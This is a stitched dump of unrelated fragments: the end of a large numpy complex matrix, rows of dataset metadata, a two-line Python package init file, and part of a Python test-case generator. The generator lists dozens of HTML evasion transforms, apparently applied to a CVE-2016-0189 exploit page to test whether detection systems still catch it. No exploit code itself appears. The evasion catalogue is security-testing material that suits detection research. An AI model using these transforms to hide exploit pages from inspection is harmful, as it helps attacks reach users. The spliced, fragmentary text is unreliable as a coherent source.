0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]])
}
| 126.26633
| 343
| 0.187971
| 65,586
| 349,884
| 1.002714
| 0.000686
| 0.664102
| 0.984885
| 1.31318
| 0.997004
| 0.997004
| 0.997004
| 0.997004
| 0.997004
| 0.997004
| 0
| 0.28431
| 0.560706
| 349,884
| 2,770
| 344
| 126.311913
| 0.143557
| 0.000506
| 0
| 0.992397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.000362
| 0
| 0.000362
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
07a9cd0be9dbbba103762215a4490d7713660b36
| 48
|
py
|
Python
|
aspire/__init__.py
|
Constructionware/aspireAPI
|
b558fa2f3971698f2784d8b03e1241f282a1df0b
|
[
"MIT"
] | 1
|
2022-01-20T04:15:27.000Z
|
2022-01-20T04:15:27.000Z
|
aspire/__init__.py
|
Constructionware/aspire
|
b558fa2f3971698f2784d8b03e1241f282a1df0b
|
[
"MIT"
] | null | null | null |
aspire/__init__.py
|
Constructionware/aspire
|
b558fa2f3971698f2784d8b03e1241f282a1df0b
|
[
"MIT"
] | null | null | null |
from aspire.web import *
from aspire import ext
| 16
| 24
| 0.791667
| 8
| 48
| 4.75
| 0.625
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 48
| 2
| 25
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
07c62dd260d75dfb77366f10960ec1045a6ea977
| 55,069
|
py
|
Python
|
sets/1/cases/HtmlEvasion/cve_2016_0189_v2.py
|
CreatePhotonW/HtmlmthCases
|
e9140c56f14b24eb011f3283e6e946ead95ce75f
|
[
"MIT"
] | null | null | null |
sets/1/cases/HtmlEvasion/cve_2016_0189_v2.py
|
CreatePhotonW/HtmlmthCases
|
e9140c56f14b24eb011f3283e6e946ead95ce75f
|
[
"MIT"
] | null | null | null |
sets/1/cases/HtmlEvasion/cve_2016_0189_v2.py
|
CreatePhotonW/HtmlmthCases
|
e9140c56f14b24eb011f3283e6e946ead95ce75f
|
[
"MIT"
] | 1
|
2021-02-05T17:29:04.000Z
|
2021-02-05T17:29:04.000Z
|
from collections import deque, OrderedDict
from utils import TransformFunction
import evasions.html
def get_cases(long_descriptions=False):
cases = []
# singles/minimums
# html based evasions
cases.append(TransformFunction("HtmlEvasion-null-001", None, evasions.html.null))
cases.append(TransformFunction("HtmlEvasion-html-001", None, evasions.html.remove_html_comments))
cases.append(TransformFunction("HtmlEvasion-html-002", None, evasions.html.pad_body_with_div)) # horizontal
cases.append(TransformFunction("HtmlEvasion-html-003", None, evasions.html.move_body_to_nested_div)) # vertical
cases.append(TransformFunction("HtmlEvasion-html-004", None, evasions.html.move_body_to_nested_div_pad_children_in_last_one)) # vertical then horizontal
cases.append(TransformFunction("HtmlEvasion-html-005", None, evasions.html.move_body_to_nested_div_with_children.parameterize(N=1041, M=1000000))) # vertical then tree
cases.append(TransformFunction("HtmlEvasion-html-006", None, evasions.html.xua_meta_change_value_8))
cases.append(TransformFunction("HtmlEvasion-html-007", None, evasions.html.xua_meta_change_value_8, evasions.html.script_language_add_encode))
cases.append(TransformFunction("HtmlEvasion-html-008", None, evasions.html.xua_meta_change_value_8, evasions.html.script_language_add_encode, evasions.html.encoded_script))
cases.append(TransformFunction("HtmlEvasion-html-009", None, evasions.html.insert_slash_after_opening_tag_names))
cases.append(TransformFunction("HtmlEvasion-html-010", None, evasions.html.insert_many_slash_after_html_opening_tag_name))
cases.append(TransformFunction("HtmlEvasion-html-011", None, evasions.html.insert_many_slash_after_opening_tag_names.parameterize(N=783)))
cases.append(TransformFunction("HtmlEvasion-html-012", None, evasions.html.attributes_reverse))
cases.append(TransformFunction("HtmlEvasion-html-013", None, evasions.html.attributes_insert_newlines))
cases.append(TransformFunction("HtmlEvasion-html-014", None, evasions.html.attributes_insert_many_newlines.parameterize(multiplier=30)))
cases.append(TransformFunction("HtmlEvasion-html-015", None, evasions.html.entity_encoding_attributes_hex))
cases.append(TransformFunction("HtmlEvasion-html-016", None, evasions.html.entity_encoding_attributes_dec))
cases.append(TransformFunction("HtmlEvasion-html-017", None, evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-018", None, evasions.html.remove_content_type_http_equiv_meta))
cases.append(TransformFunction("HtmlEvasion-html-019", None, evasions.html.xua_move_meta_to_headers))
cases.append(TransformFunction("HtmlEvasion-html-020", None, evasions.html.external_resource_internal_script))
cases.append(TransformFunction("HtmlEvasion-html-021", None, evasions.html.data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data))
cases.append(TransformFunction("HtmlEvasion-html-022", None, evasions.html.data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data_min))
cases.append(TransformFunction("HtmlEvasion-html-023", None, evasions.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data))
cases.append(TransformFunction("HtmlEvasion-html-024", None, evasions.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data_no))
cases.append(TransformFunction("HtmlEvasion-html-025", None, evasions.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_url))
cases.append(TransformFunction("HtmlEvasion-html-026", None, evasions.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data))
cases.append(TransformFunction("HtmlEvasion-html-027", None, evasions.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data_no))
cases.append(TransformFunction("HtmlEvasion-html-028", None, evasions.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_url))
# Content-Type based evasions
cases.append(TransformFunction("HtmlEvasion-html-100", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_no_type))
cases.append(TransformFunction("HtmlEvasion-html-101", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-102", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-103", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-104", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-105", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-106", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_no_type_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-107", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_text_html_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-108", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-109", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-110", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-111", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.convert_to_xhtml_http_declared_image_svg_xml))
cases.append(TransformFunction("HtmlEvasion-html-112", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_no_type))
cases.append(TransformFunction("HtmlEvasion-html-113", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-114", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-115", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xml))
cases.append(TransformFunction("HtmlEvasion-html-116", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_application_xhtml_xml))
cases.append(TransformFunction("HtmlEvasion-html-117", None, evasions.html.remove_content_type_http_equiv_meta, evasions.html.meta_declared_text_html, evasions.html.convert_to_xhtml_no_xml_tag_http_declared_image_svg_xml))
